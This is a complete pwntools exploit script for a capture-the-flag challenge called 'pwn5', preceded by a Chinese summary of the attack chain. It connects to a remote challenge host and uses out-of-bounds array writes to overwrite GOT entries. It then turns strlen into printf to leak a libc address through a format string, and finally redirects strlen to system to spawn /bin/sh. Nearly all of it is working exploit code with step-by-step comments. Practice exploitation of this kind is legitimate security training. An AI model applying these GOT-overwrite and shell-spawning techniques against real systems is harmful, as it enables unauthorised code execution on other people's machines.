利用两次数组越界写（下标 -49、-56 落在 GOT 上），先把 exit@got 改成任意一个能保证栈平衡的函数/gadget，再把 strlen@got 改成 printf@plt，这样程序对输入调用 strlen 时实际执行的是 printf，形成格式化字符串漏洞；随后在输入中放入 puts@got 地址并用 %9$s 读出 puts 的 libc 地址，据此计算 libc 基址；最后再次利用数组越界把 strlen@got 改成 system，输入 /bin/sh 即可弹 shell。
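"""Exploit for the ``pwn5`` challenge (non-PIE x86-64 binary, glibc 2.31).

Attack chain (matches the summary above the script):

1. Two out-of-bounds writes through the "add" menu option overwrite GOT
   entries.  ``exit@got`` receives the ``pop_add`` gadget so the hijacked
   exit call returns instead of terminating the process (the gadget's exact
   instructions are not shown here; the author's note says only that it keeps
   the stack balanced).  ``strlen@got`` receives ``printf@plt``, so the
   program's ``strlen(input)`` becomes ``printf(input)`` -- a format-string
   read primitive on attacker-controlled input.
2. ``%9$s`` with ``puts@got`` placed as the 9th positional argument prints the
   libc address of ``puts``; the libc base follows from the symbol offset.
3. A third out-of-bounds write replaces ``strlen@got`` with ``system``; the
   next "number" input is ``/bin/sh``, so ``strlen(input)`` runs
   ``system("/bin/sh")``.

Everything numeric here (OOB indices -56/-49, PLT and gadget addresses, the
``%9$s`` stack offset, the libc build) is tied to this exact binary and
environment and must be re-derived for any other build.
"""
from pwn import *
from LibcSearcher import *  # only used by the commented-out offline fallback
from struct import pack
from ctypes import *

# Local-debugging variants kept for reference; the remote target is live.
# ld_path = "/mnt/hgfs/test/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/ld-2.27.so"
# libc_path = "../libc/Ubuntu18-64.so"
# p = process([ld_path, "../pwn"], env={"LD_PRELOAD": libc_path})
p = remote('node4.anna.nssctf.cn', 28533)
FILENAME = '../pwn5'
# p = process(FILENAME)
elf = ELF(FILENAME)
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# libc = ELF('../libc/libc6_2.27-3ubuntu1.4_amd64.so')
# libc = ELF('../libc.so.6')
libc = ELF('../glibc-all-in-one-master/libs/2.31-0ubuntu9_amd64/libc-2.31.so')
# context.arch = 'amd64'
# gdb.attach(p, 'b *0x40139C\n')  # -448


def add(index, num):
    """Drive menu option 2 ("add"): store ``num`` at array slot ``index``.

    ``index`` is sent verbatim and is not bounds-checked by the target, so a
    negative value is the out-of-bounds write primitive.  ``num == -1`` is a
    sentinel: the function returns right after the "number" prompt without
    sending a value, so the caller can send its own raw bytes (the format
    string or ``/bin/sh``) where the program expects the number.
    """
    p.recvuntil(b'choice')
    p.sendline(b'2')
    p.recvuntil(b'one?')
    p.sendline(str(index).encode())
    p.recvuntil(b'number')
    if num == -1:
        return
    p.sendline(str(num).encode())


def show():
    """Drive menu option 1 ("show"); unused by the final chain, kept for debugging."""
    p.recvuntil(b'choice')
    p.sendline(b'1')


# Hard-coded addresses: the binary is non-PIE (0x40xxxx), so PLT stubs and
# gadgets are fixed.
puts_plt = 0x4010C4
printf_plt = 0x4010F4
pop_add = 0x4012DD  # stack-balancing gadget used as the exit@got replacement
puts_got = elf.got['puts']

# Array-slot offsets that land on the GOT: -56 -> strlen@got, -49 -> exit@got.
STRLEN_IDX = -56
EXIT_IDX = -49

# Step 1: neutralise exit() and turn strlen(input) into printf(input).
add(EXIT_IDX, pop_add)
add(STRLEN_IDX, printf_plt)

# Step 2: leak puts@libc.  The format string is NUL-padded after '%9$s', so
# printf stops before the address that follows; that address is the 9th
# positional argument when the input buffer itself is on the stack.  Note the
# payload is sent with sendline: if puts_got ever contained 0x0a the target's
# line-based read would presumably truncate it -- re-check on another build.
add(0, -1)
payload = b'%9$s'.ljust(8, b'\x00') + p64(puts_got)
p.sendline(payload)
leak = p.recvuntil(b'\x7f', timeout=5)
if not leak:
    raise RuntimeError('no libc leak received; check the %9$s stack offset')
# Low 6 bytes of a userland x86-64 pointer, little-endian, top byte 0x7f.
libc_add = u64(leak[-6:].ljust(8, b'\x00'))
libcbase = libc_add - libc.sym['puts']
# Sanity-check the leak before building on it: a real libc base is page aligned,
# so a non-aligned value means the wrong libc build or a mis-parsed leak.
if libcbase & 0xfff:
    raise RuntimeError(f'implausible libc base {libcbase:#x}; wrong libc build?')
system = libcbase + libc.sym['system']
# Offline fallback when the exact libc build is unknown:
# libc = LibcSearcher('puts', libc_add)
# libcbase = libc_add - libc.dump('puts')
success('libcbase' + hex(libcbase))

# Step 3: strlen -> system, then make the "number" input the command string.
add(STRLEN_IDX, system)
add(0, -1)
p.sendline(b'/bin/sh\x00')
p.interactive()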
